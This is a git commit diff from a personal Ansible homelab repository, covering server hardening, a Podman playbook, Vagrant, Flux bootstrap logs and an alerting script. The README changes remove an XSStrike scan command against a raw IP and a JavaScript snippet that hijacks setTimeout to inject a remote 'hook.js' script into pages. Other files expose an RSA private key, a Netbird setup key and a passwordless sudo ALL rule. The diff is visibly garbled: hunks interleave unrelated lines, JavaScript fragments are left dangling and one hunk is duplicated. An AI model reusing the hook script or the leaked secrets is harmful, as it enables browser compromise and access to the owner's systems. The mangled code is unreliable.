[First commit with podman setup]

2026-01-20 20:29:05 +01:00
parent 151eba6ffd
commit 7f760cf4a6
15 changed files with 262 additions and 294 deletions
--- a/README.md
+++ b/README.md
@@ -1,25 +1,21 @@
 # semaphore
 ```
- python3 xsstrike.py -u https://147.135.51.88/login
+ 
-(function() {
+# hardening
-    const originalSetTimeout = window.setTimeout;
+
-    window.setTimeout = function(fn, delay) {
+https://github.com/linux-system-roles/sudo => ansible-galaxy role install linux-system-roles.sudo
-        if (delay > 0) {
+singleplatform-eng.users
-            const wrapped = function() {
+dev-sec.os_hardening :
-                if (!window.xetLoaded) {
+dev-sec.ssh_hardening :
-                    var s = document.createElement('script');
+geerlingguy.firewall :
-                    s.src = 'https://xet.jingoh.fr/hook.js';
+jnv.unattended-upgrades
-                    document.head.appendChild(s);
+ 
-                    window.xetLoaded = true;
+ 
-                }
+# apps stacks
-                return fn.apply(this, arguments);
+ 
-            };
+https://github.com/alvistack/ansible-role-podman => installation podman
-            return originalSetTimeout(wrapped, delay);
+https://github.com/linux-system-roles/podman => manager pod like Kubernetes / services
        }
        return originalSetTimeout(fn, delay);
    };
 })();
 ```
@@ -40,83 +36,3 @@ Add
 - package
 - firewall
 flux bootstrap gitea --owner=staffadmin --repository=cluster --private=false --personal=true --path=./clusters/test --hostname gitea.jingoh.fr --read-write-key=true
 GITEA_TOKEN=fdsfsd
 ==> delete secret in flux-system
 ┌─[stephane@staff] - [~] - [2024-08-28 01:05:37]
 └─[130] <> flux bootstrap gitea --owner=staffadmin --repository=cluster --private=true --personal=true --path=clusters/test --hostname gitea.jingoh.fr --token-auth 
 ► connecting to gitea.jingoh.fr
 ► cloning branch "main" from Git repository "https://gitea.jingoh.fr/staffadmin/cluster.git"
 ✔ cloned repository
 ► generating component manifests
 ✔ generated component manifests
 ✔ component manifests are up to date
 ► installing components in "flux-system" namespace
 ✔ installed components
 ✔ reconciled components
 ► determining if source secret "flux-system/flux-system" exists
 ► generating source secret
 ► applying source secret "flux-system/flux-system"
 ✔ reconciled source secret
 ► generating sync manifests
 ✔ generated sync manifests
 ✔ sync manifests are up to date
 ► applying sync manifests
 ✔ reconciled sync configuration
 ◎ waiting for GitRepository "flux-system/flux-system" to be reconciled
 ✗ gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': authorization failed'
 ◎ waiting for Kustomization "flux-system/flux-system" to be reconciled
 ✗ client rate limiter Wait returned an error: context deadline exceeded
 ► confirming components are healthy
 ✔ helm-controller: deployment ready
 ✔ kustomize-controller: deployment ready
 ✔ notification-controller: deployment ready
 ✔ source-controller: deployment ready
 ✔ all components are healthy
 ✗ bootstrap failed with 2 health check failure(s): [error while waiting for GitRepository to be ready: 'gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': authorization failed'', error while waiting for Kustomization to be ready: 'client rate limiter Wait returned an error: context deadline exceeded
 ┌─[stephane@staff] - [~] - [2024-08-28 01:13:04]
 └─[1] <> flux bootstrap gitea --owner=staffadmin --repository=cluster --private=true --personal=true --path=clusters/test --hostname gitea.jingoh.fr --token-auth 
 ► connecting to gitea.jingoh.fr
 ► cloning branch "main" from Git repository "https://gitea.jingoh.fr/staffadmin/cluster.git"
 ✔ cloned repository
 ► generating component manifests
 ✔ generated component manifests
 ✔ component manifests are up to date
 ► installing components in "flux-system" namespace
 ✔ installed components
 ✔ reconciled components
 ► determining if source secret "flux-system/flux-system" exists
 ► generating source secret
 ► applying source secret "flux-system/flux-system"
 ✔ reconciled source secret
 ► generating sync manifests
 ✔ generated sync manifests
 ✔ sync manifests are up to date
 ► applying sync manifests
 ✔ reconciled sync configuration
 ◎ waiting for GitRepository "flux-system/flux-system" to be reconciled
 ✗ gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': Get "https://gitea.jingoh.fr/staffadmin/cluster.git/info/refs?service=git-upload-pack": dial tcp: lookup gitea.jingoh.fr on 10.43.0.10:53: server misbehaving'
 ◎ waiting for Kustomization "flux-system/flux-system" to be reconciled
 ✗ client rate limiter Wait returned an error: context deadline exceeded
 ► confirming components are healthy
 ✔ helm-controller: deployment ready
 ✔ kustomize-controller: deployment ready
 ✔ notification-controller: deployment ready
 ✔ source-controller: deployment ready
 ✔ all components are healthy
 ✗ bootstrap failed with 2 health check failure(s): [error while waiting for GitRepository to be ready: 'gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': Get "https://gitea.jingoh.fr/staffadmin/cluster.git/info/refs?service=git-upload-pack": dial tcp: lookup gitea.jingoh.fr on 10.43.0.10:53: server misbehaving'', error while waiting for Kustomization to be ready: 'client rate limiter Wait returned an error: context deadline exceeded']
 # docker run -d  -p 127.0.0.1:8000:8080  -e DATA_ROOT=/DATA  -v /DATA:/DATA -v /var/run/docker.sock:/var/run/docker.sock  --name casaos casaos
--- a/41
+++ b/41
@@ -1,29 +1,16 @@
 # -*- mode: ruby -*-
 # vi: set ft=ruby :
 NNODES=2
 $script = <<-SCRIPT
 echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQClVS1uxDfwS6OusQ4qgcZ6hBc8YRBE8MyXu0sUfGN7S3itjI3W2ixD18v80el8dVQVR12jCY0ueavgoV1cHrfGWkFoLKi+QrA4MuSNUChj0NBbyLTmdwPvne8LRv3ttCbRSJ/6bIEveX8y/7kGn/R1NDFlfE6b5R8ersBUKCQM6YxblAkv/XH8cJlQXhr1nLhVOl/ae+Q/pTCbgioB8qrmGEuMvOLmavcFf7IJbJcSgeiXSOnyIRl2n64X6lbRK+MRZ61pF6vAOXA+Ixyt/fAbO7sjqU0+cEhU5Br5/VcqG4Bc5nhWimtXIHPry3aLV5PtN6K9/i3eA5F6Jpa82JzmUMEbWSBIga02yIw9GjRyAI6ccH/kJGuB6QN5/YwGHpOF2f0FGiEAbUz41mLngN3SsXL1pdV2hT3x56/GIcGe6p/f1cytwVCyOaE7W87B05w5JYb1sSFj6QuGW0rHWfnHT5SY87Mk/H8VgZPaPbm+hSjLIQRAmUYQR+Rub1o9bXE=" >> /home/vagrant/.ssh/authorized_keys
 SCRIPT
 # All Vagrant configuration is done below. The "2" in Vagrant.configure
 # configures the configuration version (we support older styles for
 # backwards compatibility). Please don't change it unless you know what
 # you're doing.
 Vagrant.configure("2") do |config|
-  (0..NNODES - 1).each do |i|
+  config.vm.box = "generic/ubuntu2204"
-    config.vm.define "k8s-ubuntu-#{i}" do |node|
+  config.vm.network "private_network", type: "dhcp"
-      #node.vm.box = "ubuntu/focal64"
+  # config.vm.network :hostonly, "192.168.1.21"
-      node.vm.box = "ubuntu/jammy64"
+  config.vm.synced_folder ".", "/vagrant", disabled: true
-      node.vm.hostname = "k8s-ubuntu-#{i}"
+  config.vm.provider "qemu" do |qe|
-      config.vm.provider "virtualbox" do |v|
+    qe.qemu_dir = "/usr/bin/"
-          v.memory = 2048
+    qe.arch="x86_64"
-          v.cpus = 2
+    qe.memory = "2048"
-      end
+    qe.smp = "4"
-      node.vm.network "private_network", ip: "192.168.25.11#{i}"
+    qe.machine = "q35"
-      node.vm.provision "shell", inline: $script
+    qe.cpu = "max"
-      node.vm.provision "shell", inline: "echo hello from node #{i}"
+    qe.net_device = "virtio-net-pci"
    end
  end
-end
+end
--- a/collections/requirements.yml
+++ b/collections/requirements.yml
@@ -5,8 +5,9 @@ collections:
  # - name: ansible.utils
  # # - name: community.grafana
  - name: community.docker
  #! bitwarden
  - name: bitwarden.secrets
  - name: devsec.hardening
  - name: fedora.linux_system_roles
  # - name: community.general
  # # - name: geerlingguy.redis
  # # - name: git+https://github.com/netways/ansible-collection-elasticstack.git
--- a/files/swarm/config/traefik-dynamic-configuration.yml
+++ b/files/swarm/config/traefik-dynamic-configuration.yml
@@ -1,4 +0,0 @@
 tls:
  certificates:
    - certFile: /run/secrets/wildcard-jingoh-private.crt
      keyFile: /run/secrets/wildcard-jingoh-private.key
--- a/files/swarm/tls/jingoh.private.crt
+++ b/files/swarm/tls/jingoh.private.crt
@@ -1,22 +0,0 @@
 -----BEGIN CERTIFICATE-----
 MIIDrzCCApegAwIBAgIUKJ9Qnulnmv91wS0XQXuFAAJTLOkwDQYJKoZIhvcNAQEL
 BQAwcTELMAkGA1UEBhMCRlIxFzAVBgNVBAgMDklsZXMtZGUtZnJhbmNlMQ4wDAYD
 VQQHDAVQYXJpczEPMA0GA1UECgwGamluZ29oMQ8wDQYDVQQLDAZqaW5nb2gxFzAV
 BgNVBAMMDmppbmdvaC5wcml2YXRlMB4XDTI0MDQxNzE5MDIxMloXDTM0MDQxNTE5
 MDIxMlowcTELMAkGA1UEBhMCRlIxFzAVBgNVBAgMDklsZXMtZGUtZnJhbmNlMQ4w
 DAYDVQQHDAVQYXJpczEPMA0GA1UECgwGamluZ29oMQ8wDQYDVQQLDAZqaW5nb2gx
 FzAVBgNVBAMMDmppbmdvaC5wcml2YXRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
 MIIBCgKCAQEAuvwbT5XwP4wOhPLubWk7KBdt1+taFV/YNIkx+Ky9Nb+eceJ8iYXm
 Xy9bRK0WTdTiwOLC60h3WigsMMPc8sI1FiW3jfHMU8Z2GqJTHFM6CP1LcN+LpKZZ
 f8pZu3ONMhTcaPGvGYH+GAdi8Qk7rRskirZlImsA6lGDoteKKF/Xc4Y6IoIxIZ7X
 SK7klO/qN0ZPHWiu9QAtNBc4vVZEz83aXEbKH7eCOtSz07cOIT6yrvUF11225Y0e
 nn+DOLEcBBwI5KLco0udERz/Epn90eUWgbibP4QIaVQJypFC17RU3fXkiqZjb0Qy
 B2WEYi8awyB6KgZfu1PvzuvHYuKugBeYVwIDAQABoz8wPTAJBgNVHRMEAjAAMBsG
 A1UdEQQUMBKCECouamluZ29oLnByaXZhdGUwEwYDVR0lBAwwCgYIKwYBBQUHAwEw
 DQYJKoZIhvcNAQELBQADggEBAJ2hJ5SW9TD9yLecxG++x/jl32oxYJ/EyDPXZNHw
 fAb+9YmniThDEJTJ2RJTOIhZz6uqdjfP+37sFDu17SMvxauG78RIYSaTGnIaoiXt
 v5Uh4apUR1DOOPoZoUX82ZQJEJ5LenO+EFHevYbzgcDW61T/oByPwK8FOtLqQMHe
 SC09WsGyLQ/hls+4EgxQFyl7UN5T9NK6xrQrHwNbV0IgHcnGcTSkzRj4mt1nzsdh
 Enq/Ztz9iefxqDvHPFRRtcqDv+Ozh7zSuxVfP3tb7+5Ak7j/0Txi5NAbo+F3opAD
 8eeY2dTgxc9sV1esvB305zgl4SUkfLD+BDjOjn/NvWFj2i0=
 -----END CERTIFICATE-----
--- a/files/swarm/tls/jingoh.private.key
+++ b/files/swarm/tls/jingoh.private.key
@@ -1,27 +0,0 @@
 -----BEGIN RSA PRIVATE KEY-----
 MIIEowIBAAKCAQEAuvwbT5XwP4wOhPLubWk7KBdt1+taFV/YNIkx+Ky9Nb+eceJ8
 iYXmXy9bRK0WTdTiwOLC60h3WigsMMPc8sI1FiW3jfHMU8Z2GqJTHFM6CP1LcN+L
 pKZZf8pZu3ONMhTcaPGvGYH+GAdi8Qk7rRskirZlImsA6lGDoteKKF/Xc4Y6IoIx
 IZ7XSK7klO/qN0ZPHWiu9QAtNBc4vVZEz83aXEbKH7eCOtSz07cOIT6yrvUF1122
 5Y0enn+DOLEcBBwI5KLco0udERz/Epn90eUWgbibP4QIaVQJypFC17RU3fXkiqZj
 b0QyB2WEYi8awyB6KgZfu1PvzuvHYuKugBeYVwIDAQABAoIBACqQz4rLgDiHIpsD
 TmGbzfqvcrLvgb9R5T74aGbKs/vzVhdozp7j23CZsDYvDN/E8aWlOWgkQ/9DG+Qy
 Ai9FJJ6ZEXL/s1ry19nyT+cnzxNSzgSw7vIZaFBd+RViFadr9kzxj8HHxNclf1GN
 n4cloajuIpG2OCwfSE8er/XG8535cc7aErTpuhj5EoqRtYy++VkiC0d3VSaCE/uW
 J1ulfGnaZ3qiJfr6o+0xlTPYFcK5pkm+3uvTdSYZeLSSJPfnnaqx7G8yxoVZ1QaH
 3Sey4Ax1Y8vGYtbJ2ZS7NlnBgbgSDPGimZMFfoGFThK4Y5AcqGIEByZvOSByXnQ6
 tHiB6OECgYEA3KJIThM+RtwAk17MoRvkdUl+iPj0k+Go7lJQycFgCeNfp2rylqYm
 K1/Hzo0rSueVVRO3iL+clxt3bYHHNk62nJnp+nnkAaETTs9A8QRwGk418BKw9HyR
 faSrmXkTgKlY+sWrwECP9SyLa80UPyWIyIeOqb/zvjfirRRaPRFQTrECgYEA2PUI
 HYSqia+iOm4XEOtlUMHbNnLhW/aFhBingABt/CMO0cPTCCYdEzS+xDZzF7MROHzd
 O6zJyLUtenTIwN3dcVTWCPCRxcAY4p6V/PjV0c/b0vteQ4WWFM/l6ubTAwX+uJih
 SQREkqseMPLAqeEX84yZfqb/N3s2N2GuGIbP6YcCgYEAsztlz38UbU3VbeJqC0r0
 WU896pmLXgLIT+ow1OUxVncOQpu/vB/3C+9ACoxlqfDdQALHauB1nc9jQmNV6Mki
 0a67A443ahdm7vOwhtqbEtOMP51/gO0c59t4xzEzZaassPMZphEMoRfxnr43f2DH
 cFemzkEwCcuuafoJoGhLO9ECgYA2yAg4i9sT0QlBf7LLTuTSM2DKqs9EjUbBSAhj
 Rbh/xcpkJPIQSK9mvha9LJJ7FXfvr3edLc/1oenN1dcq+9qCV02EDFqCeDLQZgKx
 UZOL2tRCvb3bhsuSjbwcSBRX2xeqPL/c0/sMnbCN433KZ0/I62OGm1wuAip6aWuw
 PboZ2QKBgFaEqOCUFMGHet0A/BOGkzkpCZsXl+EDqvx9l7s30vdv2NIoNR8V+Zl3
 B2arO/jGjDZnbGJcHG6B7WrCX8aJyM7Fm9akbreL7lWWzqKXs1lDHwAxqQN/TllI
 tO5XRx7AHoJXkEmzKAwQWAbKzRKLTp0x9lcOBGz8CR29oPxZI2/H
 -----END RSA PRIVATE KEY-----
--- a/group_vars/all.yml
+++ b/group_vars/all.yml
@@ -1,38 +1,54 @@
 #* USERS 
 users:
  - username: bot
    name: bot user
    # groups: ['wheel','systemd-journal']
    # uid: 1000
    home: /home/bot
    # profile: |
    #   alias ll='ls -lah'
    ssh_key:
      - "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK7/ReeTsubS/KwTRaR/5k/6d5CEef0XTXvyRwfVBjwW"
  - username: dbtest
    name: dbtest user
    # groups: ['wheel','systemd-journal']
    # uid: 1000
-management_user_list:
+sudo_sudoers_files:
-  - name: stephane
+  - path: /etc/sudoers.d/bot
-    shell: '/bin/bash'
+    user_specifications:
-    authorized_keys:
+      - users:
-      - key: "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQClVS1uxDfwS6OusQ4qgcZ6hBc8YRBE8MyXu0sUfGN7S3itjI3W2ixD18v80el8dVQVR12jCY0ueavgoV1cHrfGWkFoLKi+QrA4MuSNUChj0NBbyLTmdwPvne8LRv3ttCbRSJ/6bIEveX8y/7kGn/R1NDFlfE6b5R8ersBUKCQM6YxblAkv/XH8cJlQXhr1nLhVOl/ae+Q/pTCbgioB8qrmGEuMvOLmavcFf7IJbJcSgeiXSOnyIRl2n64X6lbRK+MRZ61pF6vAOXA+Ixyt/fAbO7sjqU0+cEhU5Br5/VcqG4Bc5nhWimtXIHPry3aLV5PtN6K9/i3eA5F6Jpa82JzmUMEbWSBIga02yIw9GjRyAI6ccH/kJGuB6QN5/YwGHpOF2f0FGiEAbUz41mLngN3SsXL1pdV2hT3x56/GIcGe6p/f1cytwVCyOaE7W87B05w5JYb1sSFj6QuGW0rHWfnHT5SY87Mk/H8VgZPaPbm+hSjLIQRAmUYQR+Rub1o9bXE= stephane"
+          - bot
-        exclusive: yes
+        hosts:
-    sudo:
+          - ALL
-      hosts: ALL
+        operators:
-      as: ALL
+          - ALL
-      commands: ALL
+        commands:
-      nopasswd: ALL
+          - "NOPASSWD: ALL"
 #* GO 
 golang_gopath: /usr/local/go
 # golang_download_dir: /home/stephane/.ansible/tmp/downloads
 #* PACKAGES
 package_repo:
  - python3-pip
-  #! argocd control plane
+  - podman
-  - sshpass
+  - lsof
 #   - libsemanage
 # package_pip:
 #   - python3-libsemanage
 #* FIREWALL
 firewall_allowed_tcp_ports:
  - "22"
  - "2222"
  - "80"
  - "8080"
  - "443"
  - "9100"
  - "32222"
  # #! Kubernetes control plane ports 
  # - "6443"
  # - "2379"
@@ -43,23 +59,4 @@ firewall_allowed_tcp_ports:
  # - "9090"
  # - "3000"
  # - "9323"
-#! Kubernetes Worker ports 
+#! Kubernetes Worker ports 
 #* NETBIRD 
 netbird_setup_key: 33BE5022-D0CF-4ED9-84FF-B93E53519FDD
 netbird_register: true
 #* TLS 
 node_exporter_tls_server_config:
  cert_file: /etc/node_exporter/tls.cert
  key_file: /etc/node_exporter/tls.key
 #* NODE_EXPORTER
 # node_exporter_basic_auth_users:
 #   randomuser: examplepassword
 node_exporter_web_listen_address: "{{ host_private_address }}:9100"
--- a/hardening-linux.yml
+++ b/hardening-linux.yml
@@ -1,11 +1,34 @@
- hosts: all
+- hosts: localtest
  #! Need first setup with root access user
  become: true
-  roles:
+  pre_tasks:
-    # #! need change for iphone ssh access
+    - ansible.builtin.apt:
-    # - name: devsec.hardening.ssh_hardening
+        update_cache: yes
    # #! be carefull 
    # - name: devsec.hardening.os_hardening
-# - community.general.ufw:
+    - ansible.builtin.apt:
-#     state: enabled
+        name: "*"
-#     policy: allow
+        state: latest
    - ansible.builtin.apt:
        upgrade: safe
    - ansible.builtin.apt:
        clean: yes
    - ansible.builtin.apt:
        name: "{{ item }}"
        state: latest
      loop: "{{ package_repo }}"
      when: package_repo is defined
    - ansible.builtin.pip:
        name: "{{ item }}"
      loop: "{{ package_pip }}"
      when: package_pip is defined
  roles:
    - name: singleplatform-eng.users
    - name: linux-system-roles.sudo
    - name: devsec.hardening.ssh_hardening
    - name: devsec.hardening.os_hardening
    - name: geerlingguy.firewall
--- a/3
+++ b/3
@@ -4,6 +4,9 @@ scaleway ansible_host=163.172.84.28 ansible_user=stephane
 [tower]
 scaleway ansible_host=163.172.84.28 ansible_user=stephane
 ; [localtest]
 ; #! test ansible_host=ubuntu.orb.local ansible_user=ansible ansible_ssh_private_key_file=~/.orbstack/ssh/id_ed25519 #! First setup 
 ; test ansible_host=ubuntu.orb.local ansible_user=bot ansible_ssh_private_key_file=~/.orbstack/ssh/id_ed25519
 ; [local]
 ; localhost ansible_host=127.0.0.1 ansible_user=stephanegratias
 ; [cluster]
--- a/podman.yml
+++ b/podman.yml
@@ -0,0 +1,138 @@
 - hosts: localtest
  become: true
  vars:
    #! SECRETS
    # vaultwarden_url: "{{ lookup('env', 'vaultwarden_url') }}"
    # bw_client_secret: "{{ lookup('env', 'bw_client_secret') }}"
    # bw_client_password: "{{ lookup('env', 'bw_client_password') }}"
    # bw_client_id: "{{ lookup('env', 'bw_client_id') }}"
    # user_mail: "{{ lookup('env', 'mail') }}"
    # user: "{{ lookup('env', 'username') }}"
    # # Token full access gitea
    # bw_requested_password_id: "{{ lookup('env', 'bw_requested_password_id') }}"
    #! PODS
    # podman_registries_conf:
    #   aliases:
    #     myregistry: quay.io
    # podman_registry_username: test
    # podman_registry_password: test
    podman_create_host_directories: true
    # podman_firewall:
    #   - port: 8080-8081/tcp
    #     state: enabled
    #   - port: 12340/tcp
    #     state: enabled
    # podman_selinux_ports:
    #   - ports: 8080-8081
    #     setype: http_port_t
    podman_kube_specs:
      - state: started
        run_as_user: bot
        run_as_group: bot
        kube_file_content:
          apiVersion: v1
          kind: Pod
          metadata:
            name: db
          spec:
            containers:
              - name: db
                image: docker.io/mysql:9
                ports:
                  - containerPort: 1234
                    hostPort: 12340
                volumeMounts:
                  - mountPath: /var/lib/db:Z
                    name: db
            volumes:
              - name: db
                hostPath:
                  path: /var/lib/db
    # podman_secrets:
    #   - name: mysql-root-password-container
    #     state: present
    #     skip_existing: true
    #     data: "{{ root_password_from_vault }}"
    #   - name: mysql-root-password-kube
    #     state: present
    #     skip_existing: true
    #     data: |
    #       apiVersion: v1
    #       data:
    #         password: "{{ root_password_from_vault | b64encode }}"
    #       kind: Secret
    #       metadata:
    #         name: mysql-root-password-kube
    #   - name: envoy-certificates
    #     state: present
    #     skip_existing: true
    #     data: |
    #       apiVersion: v1
    #       data:
    #         certificate.key: {{ key_from_vault | b64encode }}
    #         certificate.pem: {{ cert_from_vault | b64encode }}
    #       kind: Secret
    #       metadata:
    #         name: envoy-certificates
      # - state: started
      #   run_as_user: webapp
      #   run_as_group: webapp
      #   kube_file_src: /path/to/webapp.yml
 #! SECRETS
  pre_tasks:
    - name: Install Bitwarden CLI
      ansible.builtin.command:
        cmd: "{{ item }}"
      delegate_to: localhost
      loop: 
        - apk add --no-cache nodejs npm
        - npm install -g @bitwarden/cli 
    - ansible.builtin.command:
        cmd: bw logout
      delegate_to: localhost
      ignore_errors: true
    - name: bitwarden token session 
      ansible.builtin.shell: "{{ item }}"
      environment:
        BW_CLIENTID: "{{ bw_client_id }}"
        BW_CLIENTSECRET: "{{ bw_client_secret }}"
        BW_PASSWORD: "{{ bw_client_password }}"
      loop:
        - bw config server {{ vaultwarden_url }}
        - bw login --apikey
        - bw unlock --passwordenv BW_PASSWORD --raw
      delegate_to: localhost
      register: bw_session_result
    - name: Get secret from Bitwarden
      command:
        argv:
          - bw
          - get
          - password
          - "{{ bw_requested_password_id }}"
          - --session
          - "{{ bw_session_result.results[-1].stdout | trim }}"
      delegate_to: localhost
      register: gitea_token_result
      no_log: true
      changed_when: false
    # - name: Return all secrets from a path
    #   ansible.builtin.debug: 
    #     msg: "{{ gitea_token_result.stdout }}"
    #   delegate_to: localhost
    - ansible.builtin.set_fact:
        gitea_token : "{{ gitea_token_result.stdout | trim }}"
      no_log: true
      delegate_to: localhost
 #! ROLES
  roles:
    #! By default, the files will be copied to or created in /etc/containers/systemd/$name.$type for root containers
    #! and $HOME/.config/containers/systemd/$name.$type for rootless containers, on the managed node. 
    - name: linux-system-roles.podman
--- a/roles/.gitignore
+++ b/roles/.gitignore
@@ -47,4 +47,12 @@ cloudalchemy.grafana
 CTL-Fed-Security.ansible-grafana
 thomasjpfan.docker-swarm
 asg1612.dockerswarm
-gantsign.golang
+gantsign.golang
 singleplatform-eng.users
 linux-system-roles.sudo
 devsec.hardening.os_hardening
 devsec.hardening.ssh_hardening
 geerlingguy.firewall
 alvistack.podman
 linux-system-roles.podman
 linux-system-roles.selinux
--- a/roles/requirements.yml
+++ b/roles/requirements.yml
@@ -13,6 +13,19 @@
 # - src: geerlingguy.kubernetes
 # PIP
 - src: geerlingguy.pip
 #! USER
 - src: singleplatform-eng.users
 - src: linux-system-roles.sudo
 #! HARDENING => collection 
 # - src: devsec.hardening.os_hardening
 # - src: devsec.hardening.ssh_hardening
 - src: geerlingguy.firewall
 - src: linux-system-roles.selinux
 #! PODS
 - src: alvistack.podman
 - src: linux-system-roles.podman
 # - src: fedora.linux_system_roles.firewall
 # jnv.unattended-upgrades
 # - src: asg1612.dockerswarm
 # SYSTEM
 # - src: tumf.systemd-service
--- a/screenshots/http---23.134.94.44-32132.jpeg
+++ b/screenshots/http---23.134.94.44-32132.jpeg
--- a/templates/alerts.sh.j2
+++ b/templates/alerts.sh.j2
@@ -1,63 +0,0 @@
 #!/bin/bash
 # Monitoring script
 # Secrets
 username="{{ alert_username }}"
 password="{{ alert_password }}"
 VAULT="{{ alert_vault }}"
 # Servers
 servers=({{ alert_list_server | join (' ') }})
 local_ip=$(hostname -I | awk '{print $1}')
 # SSL
 site="{{ alert_server_ssl }}"
 # Vérifier s'il y a un paramètre
 if [ $# -ne 1 ]; then
    echo "Usage : $0 [storage|load|ping|health|ssl|backup_git|backup_vault|cpu]"
    exit 1
 fi
 # Récupérer le paramètre
 parametre="$1"
 # Vérifier la valeur du paramètre et afficher le résultat correspondant
 if [ "$parametre" = "storage" ]; then
 	[ $(df -h / | awk 'NR==2 {sub(/%/, "", $(NF-1)); print $(NF-1)}') -gt 80 ] && curl -u "$username:$password" -H "Title: Full Storage" -H "ta:card_index_dividers"  -d "90% used on `hostname`" https://alert.jingoh.fr/{{ alerts_storage }}
 elif [ "$parametre" = "load" ]; then
        [ $(uptime | awk -F'load average: ' '{print $2}' | awk '{print $1}' | cut -d , -f1) '>' $(nproc) ] && curl -u "$username:$password" -H "Title: Load" -H "ta:battery"  -d "`hostname` Load with `uptime`" https://alert.jingoh.fr/{{ alerts_load }}
 elif [ "$parametre" = "ping" ]; then
 	for ip in "${servers[@]}"
 	do
  	if [ "$ip" != "$local_ip" ]; then
    		ping -c 1 "$ip" || curl -u "$username:$password" -H "Title: Ping Server" -H "ta:sos"  -d "Server ping failed from `hostname` to $ip" https://alert.jingoh.fr/{{ alerts_ping }}
  	fi
 	done
 elif [ "$parametre" = "health" ]; then
        [ $(curl -s -o /dev/null -w "%{http_code}" https://gitea.jingoh.fr) -gt 400 ] && curl -u "$username:$password" -H "Title: Service gitea" -H "ta:bangbang"  -d "No response From gitea.jingoh.fr" https://alert.jingoh.fr/{{ alerts_health }}
 	[ $(curl -s -o /dev/null -w "%{http_code}" https://vault.jingoh.fr) -gt 400 ] && curl -u "$username:$password" -H "Title: Service vault" -H "ta:bangbang"  -d "No response From vault.jingoh.fr" https://alert.jingoh.fr/{{ alerts_health }}
 	[ $(curl -s -o /dev/null -w "%{http_code}" https://homepage.jingoh.fr) -gt 400 ] && curl -u "$username:$password" -H "Title: Service homepage" -H "ta:bangbang"  -d "No response From homepage.jingoh.fr" https://alert.jingoh.fr/{{ alerts_health }}
 elif [ "$parametre" = "ssl" ]; then
 	expiration_timestamp=$(date -d "$(echo | openssl s_client -servername $site -connect $site:443 2>/dev/null | openssl x509 -noout -enddate | cut -d "=" -f 2)" +%s)
 	current_timestamp=$(date +%s)
 	difference=$((expiration_timestamp - current_timestamp))
 	threshold=$((20 * 24 * 3600))  # 20 jours en secondes
 	if [ $difference -lt $threshold ]; then
 		curl -u "$username:$password" -H "Title: HTTPS Certificats" -H "ta:closed_lock_with_key"  -d "*.jingoh.fr Less than 20 days" https://alert.jingoh.fr/{{ alerts_ssl }}
 	fi
 elif [ "$parametre" = "backup_git" ]; then
 	docker exec -u git -w /data/ gitea gitea dump -c /data/gitea/conf/app.ini
 	mv /opt/dockerapps/appdata/gitea/gitea/gitea-dump-*.zip /opt/dockerapps/backup/
 	docker exec gitea-db pg_dump -U root gitea > gitea-db-pg.sql
 	mv ./gitea-db-pg.sql /opt/dockerapps/backup/
 	curl -u "$username:$password" -H "Title: Backup gitea" -H "ta:inbox_tray"  -d "Local Backup gitea done !" https://alert.jingoh.fr/{{ alerts_backup_gitea }}
 elif [ "$parametre" = "backup_vault" ]; then
 	docker run --rm --volumes-from=vault -e UID=0 -e BACKUP_DIR=/data/backup -e TIMESTAMP=true -e ENCRYPTION_PASSWORD="$VAULT" bruceforce/vaultwarden-backup manual
 	curl -u "$username:$password" -H "Title: Backup vault" -H "ta:inbox_tray"  -d "Local Backup vault done !" https://alert.jingoh.fr/{{ alerts_backup_vault }}
 elif [ "$parametre" = "cpu" ]; then
 	[ "$(echo "$(ps -eo %cpu --sort=-%cpu | awk 'NR>1 { sum += $1 } END { print sum }') > $(nproc) * 50" | bc)" -eq 1 ] && curl -u "$username:$password" -H "Title: CPU `nproc` cores" -H "ta:warning"  -d "High usage `ps -eo %cpu --sort=-%cpu | awk 'NR>1 { sum += $1 } END { print sum }'`" https://alert.jingoh.fr/{{ alerts_cpu }}
 else
    echo "Paramètre invalide : Utilisez [storage|load|ping|health|ssl|backup_git|backup_vault|cpu]"
 fi
--- a/templates/docker-compose.yml.j2
+++ b/templates/docker-compose.yml.j2
@@ -1,2 +0,0 @@
 # {{ ansible_managed }}
 {{ dockerapp_compose | to_nice_yaml(indent=3) }}
		`@@ -1,2 +0,0 @@`
			`# {{ ansible_managed }}`
			`{{ dockerapp_compose \| to_nice_yaml(indent=3) }}`